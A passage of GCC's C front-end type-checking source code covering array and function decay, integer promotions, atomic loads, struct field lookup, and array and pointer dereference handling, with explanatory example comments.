TYPE_SIZE (a2)))
{
tree memb;
for (memb = TYPE_FIELDS (a1);
memb; memb = DECL_CHAIN (memb))
{
tree mv3 = TREE_TYPE (memb);
if (mv3 && mv3 != error_mark_node
&& TREE_CODE (mv3) != ARRAY_TYPE)
mv3 = (TYPE_ATOMIC (mv3)
? c_build_qualified_type (TYPE_MAIN_VARIANT (mv3),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (mv3));
if (comptypes_internal (mv3, mv2, enum_and_int_p,
different_types_p))
break;
}
if (memb == NULL_TREE)
return 0;
}
else if (TREE_CODE (a2) == UNION_TYPE
&& (TYPE_NAME (a2) == NULL_TREE
|| TYPE_TRANSPARENT_AGGR (a2))
&& TREE_CODE (TYPE_SIZE (a2)) == INTEGER_CST
&& tree_int_cst_equal (TYPE_SIZE (a2),
TYPE_SIZE (a1)))
{
tree memb;
for (memb = TYPE_FIELDS (a2);
memb; memb = DECL_CHAIN (memb))
{
tree mv3 = TREE_TYPE (memb);
if (mv3 && mv3 != error_mark_node
&& TREE_CODE (mv3) != ARRAY_TYPE)
mv3 = (TYPE_ATOMIC (mv3)
? c_build_qualified_type (TYPE_MAIN_VARIANT (mv3),
TYPE_QUAL_ATOMIC)
: TYPE_MAIN_VARIANT (mv3));
if (comptypes_internal (mv3, mv1, enum_and_int_p,
different_types_p))
break;
}
if (memb == NULL_TREE)
return 0;
}
else
return 0;
}
/* comptypes said ok, but record if it said to warn. */
if (newval > val)
val = newval;
args1 = TREE_CHAIN (args1);
args2 = TREE_CHAIN (args2);
}
}
/* Compute the size by which to increment a pointer of type TYPE.
   For function, void, error, and incomplete types, size_one_node
   is returned.
   This function does not emit any diagnostics; the caller is responsible
   for that. */
static tree
c_size_in_bytes (const_tree type)
{
enum tree_code code = TREE_CODE (type);
if (code == FUNCTION_TYPE || code == VOID_TYPE || code == ERROR_MARK
|| !COMPLETE_TYPE_P (type))
return size_one_node;
/* Convert in case a char is more than one unit. */
return size_binop_loc (input_location, CEIL_DIV_EXPR, TYPE_SIZE_UNIT (type),
size_int (TYPE_PRECISION (char_type_node)
/ BITS_PER_UNIT));
}
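/* Illustrative example (relying on the GNU extension of arithmetic
   on void and function pointers): given "void *p;" the expression
   "p + 1" advances P by one byte, because void is incomplete and
   size_one_node is used as the increment; given "int *q;" the
   increment for "q + 1" is, in effect, sizeof (int).  */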
/* Return either DECL or its known constant value (if it has one). */
tree
decl_constant_value_1 (tree decl, bool in_init)
{
if (/* Note that DECL_INITIAL isn't valid for a PARM_DECL. */
TREE_CODE (decl) != PARM_DECL
&& !TREE_THIS_VOLATILE (decl)
&& TREE_READONLY (decl)
&& DECL_INITIAL (decl) != NULL_TREE
&& !error_operand_p (DECL_INITIAL (decl))
/* This is invalid if the initial value is not constant.
	 If it contains a function call, a memory reference,
	 or a variable, then re-evaluating it could give different results. */
&& TREE_CONSTANT (DECL_INITIAL (decl))
/* Check for cases where this is sub-optimal, even though valid. */
&& (in_init || TREE_CODE (DECL_INITIAL (decl)) != CONSTRUCTOR))
return DECL_INITIAL (decl);
return decl;
}
/* Return either DECL or its known constant value (if it has one).
Like the above, but always return decl outside of functions. */
tree
decl_constant_value (tree decl)
{
/* Don't change a variable array bound or initial value to a constant
in a place where a variable is invalid. */
return current_function_decl ? decl_constant_value_1 (decl, false) : decl;
}
/* Convert the array expression EXP to a pointer. */
static tree
array_to_pointer_conversion (location_t loc, tree exp)
{
tree orig_exp = exp;
tree type = TREE_TYPE (exp);
tree adr;
tree restype = TREE_TYPE (type);
tree ptrtype;
gcc_assert (TREE_CODE (type) == ARRAY_TYPE);
STRIP_TYPE_NOPS (exp);
if (TREE_NO_WARNING (orig_exp))
TREE_NO_WARNING (exp) = 1;
ptrtype = build_pointer_type (restype);
if (INDIRECT_REF_P (exp))
return convert (ptrtype, TREE_OPERAND (exp, 0));
/* In C++ array compound literals are temporary objects unless they are
const or appear in namespace scope, so they are destroyed too soon
to use them for much of anything (c++/53220). */
if (warn_cxx_compat && TREE_CODE (exp) == COMPOUND_LITERAL_EXPR)
{
tree decl = TREE_OPERAND (TREE_OPERAND (exp, 0), 0);
if (!TREE_READONLY (decl) && !TREE_STATIC (decl))
warning_at (DECL_SOURCE_LOCATION (decl), OPT_Wc___compat,
"converting an array compound literal to a pointer "
"is ill-formed in C++");
}
adr = build_unary_op (loc, ADDR_EXPR, exp, true);
return convert (ptrtype, adr);
}
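/* Illustrative example: given "int a[10];", using A in "a + 1"
   converts it to a pointer to its first element, i.e.
   (int *) &a[0] + 1; and given "int (*p)[10];", the expression
   "*p" decays straight back to (int *) p via the INDIRECT_REF
   shortcut above.  */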
/* Convert the function expression EXP to a pointer. */
static tree
function_to_pointer_conversion (location_t loc, tree exp)
{
tree orig_exp = exp;
gcc_assert (TREE_CODE (TREE_TYPE (exp)) == FUNCTION_TYPE);
STRIP_TYPE_NOPS (exp);
if (TREE_NO_WARNING (orig_exp))
TREE_NO_WARNING (exp) = 1;
return build_unary_op (loc, ADDR_EXPR, exp, false);
}
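/* Illustrative example: in "int g (void); ... g ();" the callee G,
   which has FUNCTION_TYPE, is rewritten as &G before the call is
   built.  */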
/* Mark EXP as read, not just set, for set but not used -Wunused
warning purposes. */
void
mark_exp_read (tree exp)
{
switch (TREE_CODE (exp))
{
case VAR_DECL:
case PARM_DECL:
DECL_READ_P (exp) = 1;
break;
case ARRAY_REF:
case COMPONENT_REF:
case MODIFY_EXPR:
case REALPART_EXPR:
case IMAGPART_EXPR:
CASE_CONVERT:
case ADDR_EXPR:
case VIEW_CONVERT_EXPR:
mark_exp_read (TREE_OPERAND (exp, 0));
break;
case COMPOUND_EXPR:
/* Pattern match what build_atomic_assign produces with modifycode
NOP_EXPR. */
if (VAR_P (TREE_OPERAND (exp, 1))
&& DECL_ARTIFICIAL (TREE_OPERAND (exp, 1))
&& TREE_CODE (TREE_OPERAND (exp, 0)) == COMPOUND_EXPR)
{
tree t1 = TREE_OPERAND (TREE_OPERAND (exp, 0), 0);
tree t2 = TREE_OPERAND (TREE_OPERAND (exp, 0), 1);
if (TREE_CODE (t1) == TARGET_EXPR
&& TARGET_EXPR_SLOT (t1) == TREE_OPERAND (exp, 1)
&& TREE_CODE (t2) == CALL_EXPR)
{
tree fndecl = get_callee_fndecl (t2);
tree arg = NULL_TREE;
if (fndecl
&& TREE_CODE (fndecl) == FUNCTION_DECL
&& fndecl_built_in_p (fndecl, BUILT_IN_NORMAL)
&& call_expr_nargs (t2) >= 2)
switch (DECL_FUNCTION_CODE (fndecl))
{
case BUILT_IN_ATOMIC_STORE:
arg = CALL_EXPR_ARG (t2, 1);
break;
case BUILT_IN_ATOMIC_STORE_1:
case BUILT_IN_ATOMIC_STORE_2:
case BUILT_IN_ATOMIC_STORE_4:
case BUILT_IN_ATOMIC_STORE_8:
case BUILT_IN_ATOMIC_STORE_16:
arg = CALL_EXPR_ARG (t2, 0);
break;
default:
break;
}
if (arg)
{
STRIP_NOPS (arg);
if (TREE_CODE (arg) == ADDR_EXPR
&& DECL_P (TREE_OPERAND (arg, 0))
&& TYPE_ATOMIC (TREE_TYPE (TREE_OPERAND (arg, 0))))
mark_exp_read (TREE_OPERAND (arg, 0));
}
}
}
/* FALLTHRU */
case C_MAYBE_CONST_EXPR:
mark_exp_read (TREE_OPERAND (exp, 1));
break;
default:
break;
}
}
/* Perform the default conversion of arrays and functions to pointers.
Return the result of converting EXP. For any other expression, just
return EXP.
LOC is the location of the expression. */
struct c_expr
default_function_array_conversion (location_t loc, struct c_expr exp)
{
tree orig_exp = exp.value;
tree type = TREE_TYPE (exp.value);
enum tree_code code = TREE_CODE (type);
switch (code)
{
case ARRAY_TYPE:
{
bool not_lvalue = false;
bool lvalue_array_p;
while ((TREE_CODE (exp.value) == NON_LVALUE_EXPR
|| CONVERT_EXPR_P (exp.value))
&& TREE_TYPE (TREE_OPERAND (exp.value, 0)) == type)
{
if (TREE_CODE (exp.value) == NON_LVALUE_EXPR)
not_lvalue = true;
exp.value = TREE_OPERAND (exp.value, 0);
}
if (TREE_NO_WARNING (orig_exp))
TREE_NO_WARNING (exp.value) = 1;
lvalue_array_p = !not_lvalue && lvalue_p (exp.value);
if (!flag_isoc99 && !lvalue_array_p)
{
/* Before C99, non-lvalue arrays do not decay to pointers.
Normally, using such an array would be invalid; but it can
be used correctly inside sizeof or as a statement expression.
Thus, do not give an error here; an error will result later. */
return exp;
}
exp.value = array_to_pointer_conversion (loc, exp.value);
}
break;
case FUNCTION_TYPE:
exp.value = function_to_pointer_conversion (loc, exp.value);
break;
default:
break;
}
return exp;
}
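/* Illustrative example of the C90 non-lvalue array case above:
     struct s { int a[4]; };
     struct s f (void);
   In C90 the non-lvalue array "f ().a" does not decay to a pointer
   here; any invalid use of it is diagnosed later.  From C99 on it
   decays like any other array.  */
/* Like default_function_array_conversion, but also mark the
   expression as having been read.  */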
struct c_expr
default_function_array_read_conversion (location_t loc, struct c_expr exp)
{
mark_exp_read (exp.value);
return default_function_array_conversion (loc, exp);
}
/* Return whether EXPR should be treated as an atomic lvalue for the
purposes of load and store handling. */
static bool
really_atomic_lvalue (tree expr)
{
if (error_operand_p (expr))
return false;
if (!TYPE_ATOMIC (TREE_TYPE (expr)))
return false;
if (!lvalue_p (expr))
return false;
/* Ignore _Atomic on register variables, since their addresses can't
be taken so (a) atomicity is irrelevant and (b) the normal atomic
sequences wouldn't work. Ignore _Atomic on structures containing
bit-fields, since accessing elements of atomic structures or
unions is undefined behavior (C11 6.5.2.3#5), but it's unclear if
it's undefined at translation time or execution time, and the
normal atomic sequences again wouldn't work. */
while (handled_component_p (expr))
{
if (TREE_CODE (expr) == COMPONENT_REF
&& DECL_C_BIT_FIELD (TREE_OPERAND (expr, 1)))
return false;
expr = TREE_OPERAND (expr, 0);
}
if (DECL_P (expr) && C_DECL_REGISTER (expr))
return false;
return true;
}
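/* Illustrative example: given "register _Atomic int r;" an access
   to R is not treated as an atomic lvalue here, so the normal
   (non-atomic) load and store paths are used instead.  */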
/* Convert expression EXP (location LOC) from lvalue to rvalue,
including converting functions and arrays to pointers if CONVERT_P.
If READ_P, also mark the expression as having been read. */
struct c_expr
convert_lvalue_to_rvalue (location_t loc, struct c_expr exp,
bool convert_p, bool read_p)
{
if (read_p)
mark_exp_read (exp.value);
if (convert_p)
exp = default_function_array_conversion (loc, exp);
if (!VOID_TYPE_P (TREE_TYPE (exp.value)))
exp.value = require_complete_type (loc, exp.value);
if (really_atomic_lvalue (exp.value))
{
vec<tree, va_gc> *params;
tree nonatomic_type, tmp, tmp_addr, fndecl, func_call;
tree expr_type = TREE_TYPE (exp.value);
tree expr_addr = build_unary_op (loc, ADDR_EXPR, exp.value, false);
tree seq_cst = build_int_cst (integer_type_node, MEMMODEL_SEQ_CST);
gcc_assert (TYPE_ATOMIC (expr_type));
      /* Expansion of a generic atomic load may require an additional
	 element, so allocate enough to prevent a resize.  */
vec_alloc (params, 4);
      /* Remove the qualifiers for the rest of the expressions and
	 create the TMP variable to hold the loaded value.  */
nonatomic_type = build_qualified_type (expr_type, TYPE_UNQUALIFIED);
tmp = create_tmp_var_raw (nonatomic_type);
tmp_addr = build_unary_op (loc, ADDR_EXPR, tmp, false);
TREE_ADDRESSABLE (tmp) = 1;
TREE_NO_WARNING (tmp) = 1;
/* Issue __atomic_load (&expr, &tmp, SEQ_CST); */
fndecl = builtin_decl_explicit (BUILT_IN_ATOMIC_LOAD);
params->quick_push (expr_addr);
params->quick_push (tmp_addr);
params->quick_push (seq_cst);
func_call = c_build_function_call_vec (loc, vNULL, fndecl, params, NULL);
/* EXPR is always read. */
mark_exp_read (exp.value);
/* Return tmp which contains the value loaded. */
exp.value = build4 (TARGET_EXPR, nonatomic_type, tmp, func_call,
NULL_TREE, NULL_TREE);
}
return exp;
}
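/* Illustrative example: for "_Atomic int x; int y = x;" the rvalue
   conversion of X builds roughly
     __atomic_load (&x, &tmp, __ATOMIC_SEQ_CST)
   with the unqualified temporary TMP, wrapped in a TARGET_EXPR that
   yields the loaded value.  */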
/* EXP is an expression of integer type. Apply the integer promotions
to it and return the promoted value. */
tree
perform_integral_promotions (tree exp)
{
tree type = TREE_TYPE (exp);
enum tree_code code = TREE_CODE (type);
gcc_assert (INTEGRAL_TYPE_P (type));
/* Normally convert enums to int,
but convert wide enums to something wider. */
if (code == ENUMERAL_TYPE)
{
type = c_common_type_for_size (MAX (TYPE_PRECISION (type),
TYPE_PRECISION (integer_type_node)),
((TYPE_PRECISION (type)
>= TYPE_PRECISION (integer_type_node))
&& TYPE_UNSIGNED (type)));
return convert (type, exp);
}
  /* ??? This should no longer be needed now that bit-fields have their
     proper types.  */
if (TREE_CODE (exp) == COMPONENT_REF
&& DECL_C_BIT_FIELD (TREE_OPERAND (exp, 1))
      /* If it's narrower than an int, promote it the way a
	 c_promoting_integer_type_p type would be; otherwise leave it alone.  */
&& compare_tree_int (DECL_SIZE (TREE_OPERAND (exp, 1)),
TYPE_PRECISION (integer_type_node)) < 0)
return convert (integer_type_node, exp);
if (c_promoting_integer_type_p (type))
{
/* Preserve unsignedness if not really getting any wider. */
if (TYPE_UNSIGNED (type)
&& TYPE_PRECISION (type) == TYPE_PRECISION (integer_type_node))
return convert (unsigned_type_node, exp);
return convert (integer_type_node, exp);
}
return exp;
}
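/* Illustrative examples: for "char c;" the expression "c + 1"
   promotes C to int; "unsigned short" promotes to int where int is
   wider, but to unsigned int where short and int have the same
   precision (the unsignedness-preserving case above).  */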
/* Perform default promotions for C data used in expressions.
   Enumeral types or short or char are converted to int.
   In addition, manifest constant symbols are replaced by their values. */
tree
default_conversion (tree exp)
{
tree orig_exp;
tree type = TREE_TYPE (exp);
enum tree_code code = TREE_CODE (type);
tree promoted_type;
mark_exp_read (exp);
/* Functions and arrays have been converted during parsing. */
gcc_assert (code != FUNCTION_TYPE);
if (code == ARRAY_TYPE)
return exp;
  /* A CONST_DECL (e.g. an enumeration constant) cannot be loaded
     directly; use its value instead.  */
if (TREE_CODE (exp) == CONST_DECL)
exp = DECL_INITIAL (exp);
/* Strip no-op conversions. */
orig_exp = exp;
STRIP_TYPE_NOPS (exp);
if (TREE_NO_WARNING (orig_exp))
TREE_NO_WARNING (exp) = 1;
if (code == VOID_TYPE)
{
error_at (EXPR_LOC_OR_LOC (exp, input_location),
"void value not ignored as it ought to be");
return error_mark_node;
}
exp = require_complete_type (EXPR_LOC_OR_LOC (exp, input_location), exp);
if (exp == error_mark_node)
return error_mark_node;
promoted_type = targetm.promoted_type (type);
if (promoted_type)
return convert (promoted_type, exp);
if (INTEGRAL_TYPE_P (type))
return perform_integral_promotions (exp);
return exp;
}
/* Look up COMPONENT in a structure or union TYPE.
If the component name is not found, returns NULL_TREE. Otherwise,
the return value is a TREE_LIST, with each TREE_VALUE a FIELD_DECL
stepping down the chain to the component, which is in the last
TREE_VALUE of the list. Normally the list is of length one, but if
the component is embedded within (nested) anonymous structures or
unions, the list steps down the chain to the component. */
static tree
lookup_field (tree type, tree component)
{
tree field;
/* If TYPE_LANG_SPECIFIC is set, then it is a sorted array of pointers
to the field elements. Use a binary search on this array to quickly
find the element. Otherwise, do a linear search. TYPE_LANG_SPECIFIC
will always be set for structures which have many elements.
Duplicate field checking replaces duplicates with NULL_TREE so
TYPE_LANG_SPECIFIC arrays are potentially no longer sorted. In that
case just iterate using DECL_CHAIN. */
if (TYPE_LANG_SPECIFIC (type) && TYPE_LANG_SPECIFIC (type)->s
&& !seen_error ())
{
int bot, top, half;
tree *field_array = &TYPE_LANG_SPECIFIC (type)->s->elts[0];
field = TYPE_FIELDS (type);
bot = 0;
top = TYPE_LANG_SPECIFIC (type)->s->len;
while (top - bot > 1)
{
half = (top - bot + 1) >> 1;
field = field_array[bot+half];
if (DECL_NAME (field) == NULL_TREE)
{
/* Step through all anon unions in linear fashion. */
while (DECL_NAME (field_array[bot]) == NULL_TREE)
{
field = field_array[bot++];
if (RECORD_OR_UNION_TYPE_P (TREE_TYPE (field)))
{
tree anon = lookup_field (TREE_TYPE (field), component);
if (anon)
return tree_cons (NULL_TREE, field, anon);
/* The Plan 9 compiler permits referring
directly to an anonymous struct/union field
using a typedef name. */
if (flag_plan9_extensions
&& TYPE_NAME (TREE_TYPE (field)) != NULL_TREE
&& (TREE_CODE (TYPE_NAME (TREE_TYPE (field)))
== TYPE_DECL)
&& (DECL_NAME (TYPE_NAME (TREE_TYPE (field)))
== component))
break;
}
}
/* Entire record is only anon unions. */
if (bot > top)
return NULL_TREE;
/* Restart the binary search, with new lower bound. */
continue;
}
if (DECL_NAME (field) == component)
break;
if (DECL_NAME (field) < component)
bot += half;
else
top = bot + half;
}
if (DECL_NAME (field_array[bot]) == component)
field = field_array[bot];
else if (DECL_NAME (field) != component)
return NULL_TREE;
}
else
{
for (field = TYPE_FIELDS (type); field; field = DECL_CHAIN (field))
{
if (DECL_NAME (field) == NULL_TREE
&& RECORD_OR_UNION_TYPE_P (TREE_TYPE (field)))
{
tree anon = lookup_field (TREE_TYPE (field), component);
if (anon)
return tree_cons (NULL_TREE, field, anon);
/* The Plan 9 compiler permits referring directly to an
anonymous struct/union field using a typedef
name. */
if (flag_plan9_extensions
&& TYPE_NAME (TREE_TYPE (field)) != NULL_TREE
&& TREE_CODE (TYPE_NAME (TREE_TYPE (field))) == TYPE_DECL
&& (DECL_NAME (TYPE_NAME (TREE_TYPE (field)))
== component))
break;
}
if (DECL_NAME (field) == component)
break;
}
if (field == NULL_TREE)
return NULL_TREE;
}
return tree_cons (NULL_TREE, field, NULL_TREE);
}
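/* Illustrative example: for
     struct s { struct { int x; }; int y; } v;
   looking up "x" yields a two-element TREE_LIST: first the unnamed
   FIELD_DECL of the anonymous struct, then the FIELD_DECL of X,
   so "v.x" can be built as a chain of COMPONENT_REFs.  */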
/* Recursively append candidate IDENTIFIER_NODEs to CANDIDATES. */
static void
lookup_field_fuzzy_find_candidates (tree type, tree component,
vec<tree> *candidates)
{
tree field;
for (field = TYPE_FIELDS (type); field; field = DECL_CHAIN (field))
{
if (DECL_NAME (field) == NULL_TREE
&& RECORD_OR_UNION_TYPE_P (TREE_TYPE (field)))
lookup_field_fuzzy_find_candidates (TREE_TYPE (field), component,
candidates);
if (DECL_NAME (field))
candidates->safe_push (DECL_NAME (field));
}
}
/* Like "lookup_field", but find the closest matching IDENTIFIER_NODE,
rather than returning a TREE_LIST for an exact match. */
static tree
lookup_field_fuzzy (tree type, tree component)
{
gcc_assert (TREE_CODE (component) == IDENTIFIER_NODE);
/* First, gather a list of candidates. */
auto_vec <tree> candidates;
lookup_field_fuzzy_find_candidates (type, component,
&candidates);
return find_closest_identifier (component, &candidates);
}
/* Support function for build_component_ref's error-handling.
Given DATUM_TYPE, and "DATUM.COMPONENT", where DATUM is *not* a
struct or union, should we suggest "DATUM->COMPONENT" as a hint? */
static bool
should_suggest_deref_p (tree datum_type)
{
/* We don't do it for Objective-C, since Objective-C 2.0 dot-syntax
allows "." for ptrs; we could be handling a failed attempt
to access a property. */
if (c_dialect_objc ())
return false;
/* Only suggest it for pointers... */
if (TREE_CODE (datum_type) != POINTER_TYPE)
return false;
/* ...to structs/unions. */
tree underlying_type = TREE_TYPE (datum_type);
enum tree_code code = TREE_CODE (underlying_type);
if (code == RECORD_TYPE || code == UNION_TYPE)
return true;
else
return false;
}
/* Make an expression to refer to the COMPONENT field of structure or
union value DATUM. COMPONENT is an IDENTIFIER_NODE. LOC is the
location of the COMPONENT_REF. COMPONENT_LOC is the location
of COMPONENT. */
tree
build_component_ref (location_t loc, tree datum, tree component,
location_t component_loc)
{
tree type = TREE_TYPE (datum);
enum tree_code code = TREE_CODE (type);
tree field = NULL;
tree ref;
bool datum_lvalue = lvalue_p (datum);
if (!objc_is_public (datum, component))
return error_mark_node;
/* Detect Objective-C property syntax object.property. */
if (c_dialect_objc ()
&& (ref = objc_maybe_build_component_ref (datum, component)))
return ref;
/* See if there is a field or component with name COMPONENT. */
if (code == RECORD_TYPE || code == UNION_TYPE)
{
if (!COMPLETE_TYPE_P (type))
{
c_incomplete_type_error (loc, NULL_TREE, type);
return error_mark_node;
}
field = lookup_field (type, component);
if (!field)
{
tree guessed_id = lookup_field_fuzzy (type, component);
if (guessed_id)
{
/* Attempt to provide a fixit replacement hint, if
we have a valid range for the component. */
location_t reported_loc
= (component_loc != UNKNOWN_LOCATION) ? component_loc : loc;
gcc_rich_location rich_loc (reported_loc);
if (component_loc != UNKNOWN_LOCATION)
rich_loc.add_fixit_misspelled_id (component_loc, guessed_id);
error_at (&rich_loc,
"%qT has no member named %qE; did you mean %qE?",
type, component, guessed_id);
}
else
error_at (loc, "%qT has no member named %qE", type, component);
return error_mark_node;
}
/* Accessing elements of atomic structures or unions is undefined
behavior (C11 6.5.2.3#5). */
if (TYPE_ATOMIC (type) && c_inhibit_evaluation_warnings == 0)
{
if (code == RECORD_TYPE)
warning_at (loc, 0, "accessing a member %qE of an atomic "
"structure %qE", component, datum);
else
warning_at (loc, 0, "accessing a member %qE of an atomic "
"union %qE", component, datum);
}
      /* Chain the COMPONENT_REFs if necessary down to the FIELD.
	 This might be better solved in the future the way the C++ front
	 end does it - by giving each of the anonymous entities a
	 separate name and type, and then having build_component_ref
	 recursively call itself.  We can't do that here.  */
do
{
tree subdatum = TREE_VALUE (field);
int quals;
tree subtype;
bool use_datum_quals;
if (TREE_TYPE (subdatum) == error_mark_node)
return error_mark_node;
/* If this is an rvalue, it does not have qualifiers in C
standard terms and we must avoid propagating such
qualifiers down to a non-lvalue array that is then
converted to a pointer. */
use_datum_quals = (datum_lvalue
|| TREE_CODE (TREE_TYPE (subdatum)) != ARRAY_TYPE);
quals = TYPE_QUALS (strip_array_types (TREE_TYPE (subdatum)));
if (use_datum_quals)
quals |= TYPE_QUALS (TREE_TYPE (datum));
subtype = c_build_qualified_type (TREE_TYPE (subdatum), quals);
ref = build3 (COMPONENT_REF, subtype, datum, subdatum,
NULL_TREE);
SET_EXPR_LOCATION (ref, loc);
if (TREE_READONLY (subdatum)
|| (use_datum_quals && TREE_READONLY (datum)))
TREE_READONLY (ref) = 1;
if (TREE_THIS_VOLATILE (subdatum)
|| (use_datum_quals && TREE_THIS_VOLATILE (datum)))
TREE_THIS_VOLATILE (ref) = 1;
if (TREE_DEPRECATED (subdatum))
warn_deprecated_use (subdatum, NULL_TREE);
datum = ref;
field = TREE_CHAIN (field);
}
while (field);
return ref;
}
else if (should_suggest_deref_p (type))
{
/* Special-case the error message for "ptr.field" for the case
where the user has confused "." vs "->". */
rich_location richloc (line_table, loc);
/* "loc" should be the "." token. */
richloc.add_fixit_replace ("->");
error_at (&richloc,
"%qE is a pointer; did you mean to use %<->%>?",
datum);
return error_mark_node;
}
else if (code != ERROR_MARK)
error_at (loc,
"request for member %qE in something not a structure or union",
component);
return error_mark_node;
}
/* Given an expression PTR for a pointer, return an expression
for the value pointed to.
   ERRSTRING identifies the operator, for use in error messages.
LOC is the location to use for the generated tree. */
tree
build_indirect_ref (location_t loc, tree ptr, ref_operator errstring)
{
tree pointer = default_conversion (ptr);
tree type = TREE_TYPE (pointer);
tree ref;
if (TREE_CODE (type) == POINTER_TYPE)
{
if (CONVERT_EXPR_P (pointer)
|| TREE_CODE (pointer) == VIEW_CONVERT_EXPR)
{
	  /* If a warning is issued, mark it to avoid duplicates from
	     the backend.  This only needs to be done when
	     warn_strict_aliasing > 2.  */
if (warn_strict_aliasing > 2)
if (strict_aliasing_warning (EXPR_LOCATION (pointer),
type, TREE_OPERAND (pointer, 0)))
TREE_NO_WARNING (pointer) = 1;
}
if (TREE_CODE (pointer) == ADDR_EXPR
&& (TREE_TYPE (TREE_OPERAND (pointer, 0))
== TREE_TYPE (type)))
{
ref = TREE_OPERAND (pointer, 0);
protected_set_expr_location (ref, loc);
return ref;
}
else
{
tree t = TREE_TYPE (type);
ref = build1 (INDIRECT_REF, t, pointer);
if (VOID_TYPE_P (t) && c_inhibit_evaluation_warnings == 0)
warning_at (loc, 0, "dereferencing %<void *%> pointer");
	  /* We *must* set TREE_READONLY when dereferencing a pointer to const,
	     so that we get the proper error message if the result is used
	     to assign to.  Also, &* is supposed to be a no-op.
	     And ANSI C seems to specify that the type of the result
	     should be the const type.  Note that marking the reference
	     read-only does not make the object itself immutable: it may
	     validly be changed via some other pointer.  */
TREE_READONLY (ref) = TYPE_READONLY (t);
TREE_SIDE_EFFECTS (ref)
= TYPE_VOLATILE (t) || TREE_SIDE_EFFECTS (pointer);
TREE_THIS_VOLATILE (ref) = TYPE_VOLATILE (t);
protected_set_expr_location (ref, loc);
return ref;
}
}
else if (TREE_CODE (pointer) != ERROR_MARK)
invalid_indirection_error (loc, type, errstring);
return error_mark_node;
}
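/* Illustrative examples: for "int x;" the expression "*&x" is
   simplified back to X by the ADDR_EXPR branch above, and for
   "void *p;" the expression "*p" draws the
   "dereferencing %<void *%> pointer" warning.  */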
/* This handles expressions of the form "a[i]", which denotes
an array reference.
This is logically equivalent in C to *(a+i), but we may do it differently.
If A is a variable or a member, we generate a primitive ARRAY_REF.
This avoids forcing the array out of registers, and can work on
arrays that are not lvalues (for example, members of structures returned
by functions).
For vector types, allow vector[i] but not i[vector], and create
*(((type*)&vectortype) + i) for the expression.
LOC is the location to use for the returned expression. */
tree
build_array_ref (location_t loc, tree array, tree index)
{
tree ret;
bool swapped = false;
if (TREE_TYPE (array) == error_mark_node
|| TREE_TYPE (index) == error_mark_node)
return error_mark_node;
if (TREE_CODE (TREE_TYPE (array)) != ARRAY_TYPE
&& TREE_CODE (TREE_TYPE (array)) != POINTER_TYPE
/* Allow vector[index] but not index[vector]. */
&& !gnu_vector_type_p (TREE_TYPE (array)))
{
if (TREE_CODE (TREE_TYPE (index)) != ARRAY_TYPE
&& TREE_CODE (TREE_TYPE (index)) != POINTER_TYPE)
{
error_at (loc,
"subscripted value is neither array nor pointer nor vector");
return error_mark_node;
}
std::swap (array, index);
swapped = true;
}
if (!INTEGRAL_TYPE_P (TREE_TYPE (index)))
{
error_at (loc, "array subscript is not an integer");
return error_mark_node;
}
if (TREE_CODE (TREE_TYPE (TREE_TYPE (array))) == FUNCTION_TYPE)
{
error_at (loc, "subscripted value is pointer to function");
return error_mark_node;
}
/* ??? Existing practice has been to warn only when the char
index is syntactically the index, not for char[array]. */
if (!swapped)
warn_array_subscript_with_type_char (loc, index);
/* Apply default promotions *after* noticing character types. */
index = default_conversion (index);
if (index == error_mark_node)
return error_mark_node;
gcc_assert (TREE_CODE (TREE_TYPE (index)) == INTEGER_TYPE);
bool was_vector = VECTOR_TYPE_P (TREE_TYPE (array));
bool non_lvalue = convert_vector_to_array_for_subscript (loc, &array, index);
if (TREE_CODE (TREE_TYPE (array)) == ARRAY_TYPE)
{
tree rval, type;
/* An array that is indexed by a non-constant
cannot be stored in a register; we must be able to do
address arithmetic on its address.
Likewise an array of elements of variable size. */
if (TREE_CODE (index) != INTEGER_CST
|| (COMPLETE_TYPE_P (TREE_TYPE (TREE_TYPE (array)))
&& TREE_CODE (TYPE_SIZE (TREE_TYPE (TREE_TYPE (array)))) != INTEGER_CST))
{
if (!c_mark_addressable (array, true))
return error_mark_node;
}
      /* An array that is indexed by a constant value which is not within
	 the array bounds cannot be stored in a register either, because we
	 would get a crash in store_bit_field/extract_bit_field when trying
	 to access a non-existent part of the register.  */
if (TREE_CODE (index) == INTEGER_CST
&& TYPE_DOMAIN (TREE_TYPE (array))
&& !int_fits_type_p (index, TYPE_DOMAIN (TREE_TYPE (array))))
{
if (!c_mark_addressable (array))
return error_mark_node;
}
if ((pedantic || warn_c90_c99_compat)
&& ! was_vector)
{
tree foo = array;
while (TREE_CODE (foo) == COMPONENT_REF)
foo = TREE_OPERAND (foo, 0);
if (VAR_P (foo) && C_DECL_REGISTER (foo))
pedwarn (loc, OPT_Wpedantic,
"ISO C forbids subscripting %<register%> array");
else if (!lvalue_p (foo))
pedwarn_c90 (loc, OPT_Wpedantic,
"ISO C90 forbids subscripting non-lvalue "
"array");
}
type = TREE_TYPE (TREE_TYPE (array));
rval = build4 (ARRAY_REF, type, array, index, NULL_TREE, NULL_TREE);
/* Array ref is const/volatile if the array elements are
or if the array is. */
TREE_READONLY (rval)
|= (TYPE_READONLY (TREE_TYPE (TREE_TYPE (array)))
| TREE_READONLY (array));
TREE_SIDE_EFFECTS (rval)
|= (TYPE_VOLATILE (TREE_TYPE (TREE_TYPE (array)))
| TREE_SIDE_EFFECTS (array));
TREE_THIS_VOLATILE (rval)
|= (TYPE_VOLATILE (TREE_TYPE (TREE_TYPE (array)))
/* This was added by rms on 16 Nov 91.
It fixes vol struct foo *a; a->elts[1]
in an inline function.
Hope it doesn't break something else. */
| TREE_THIS_VOLATILE (array));
ret = require_complete_type (loc, rval);
protected_set_expr_location (ret, loc);
if (non_lvalue)
ret = non_lvalue_loc (loc, ret);
return ret;
}
else
{
tree ar = default_conversion (array);
if (ar == error_mark_node)
return ar;
gcc_assert (TREE_CODE (TREE_TYPE (ar)) == POINTER_TYPE);
gcc_assert (TREE_CODE (TREE_TYPE (TREE_TYPE (ar))) != FUNCTION_TYPE);
ret = build_indirect_ref (loc, build_binary_op (loc, PLUS_EXPR, ar,
index, false),
RO_ARRAY_INDEXING);
if (non_lvalue)
ret = non_lvalue_loc (loc, ret);
return ret;
}
}
/* Build an external reference to identifier ID. FUN indicates
whether this will be used for a function call. LOC is the source
location of the identifier. This sets *TYPE to the type of the
identifier, which is not the same as the type of the returned value
for CONST_DECLs defined as enum constants. If the type of the
identifier is not available, *TYPE is set to NULL. */
tree
build_external_ref (location_t loc, tree id, bool fun, tree *type)
{
tree ref;
tree decl = lookup_name (id);
/* In Objective-C, an instance variable (ivar) may be preferred to
whatever lookup_name() found. */
decl = objc_lookup_ivar (decl, id);
